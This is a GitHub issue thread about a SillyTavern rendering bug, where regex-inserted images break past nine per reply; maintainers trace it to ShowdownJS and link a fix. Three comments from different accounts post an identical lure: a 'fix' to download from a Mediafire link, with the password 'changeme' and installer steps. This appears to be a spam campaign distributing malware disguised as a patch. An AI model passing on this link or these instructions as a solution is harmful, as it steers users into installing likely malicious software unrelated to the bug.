### ISSUE TITLE
[BUG] The image after regex matching cannot be displayed properly.

### ISSUE THREAD

**Issue by 1guts1** [SillyTavern/SillyTavern#2722]
### Environment

🪟 Windows

### System

Microsoft Edge edition 128.0.2739.42 

### Version

12.5

### Describe the problem

When I used regex matching to include images in the system's replies, I found that more than nine images in the same reply would become in the form of C9C, just like the image below.
![image](https://github.com/user-attachments/assets/382c565f-c1f7-4aae-9d1d-2d1692336493)
![image](https://github.com/user-attachments/assets/30282c1a-03f2-41e1-8a3c-c978c1054f58)

### Additional info

  Regex and character are provided below
[test.zip](https://github.com/user-attachments/files/16758233/test.zip)

### Please tick the boxes

- [X] I have explained the issue clearly, and I included all relevant info
- [X] I have checked that this [issue hasn't already been raised](https://github.com/SillyTavern/SillyTavern/issues?q=is%3Aissue)
- [X] I have checked the [docs](https://docs.sillytavern.app/) ![important](https://img.shields.io/badge/Important!-F6094E)

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cloak1505** [comment]
(Continuation of issue #2714.)

Error has something to do with ShowdownJS.
![console error](https://github.com/user-attachments/assets/80135a8b-cb3c-4f9f-a85c-4b4d8457b80a)
https://github.com/showdownjs/showdown/issues?q=is%3Aissue+maximum+nesting+of+10+spans+reached

**Comment by Cohee1207** [comment]
Thanks for the reference, now it's clear. @cloak1505

**Comment by Cohee1207** [comment]
(spoke too soon, the fix attempted did not actually help)

**Comment by cloak1505** [comment]
https://gist.github.com/cloak1505/985731ca98af945c9c2a28f4bd5cecd1

Yeah we were able to paste the full HTML code straight and have it display.

Regex jank issue?

**Comment by Cohee1207** [comment]
Properly addressed here: https://github.com/SillyTavern/SillyTavern/commit/da96bf3c2950163cb4efbc4a4583b58a8214f608

**Comment by Cohee1207** [comment]
> https://gist.github.com/cloak1505/985731ca98af945c9c2a28f4bd5cecd1
> Yeah we were able to paste the full HTML code straight and have it display.

Suggestion: add this style to message CSS, it will look nicer

```css
* {
  text-shadow: none !important;
}
```

**Comment by 1guts1** [comment]
Thanks for your help!
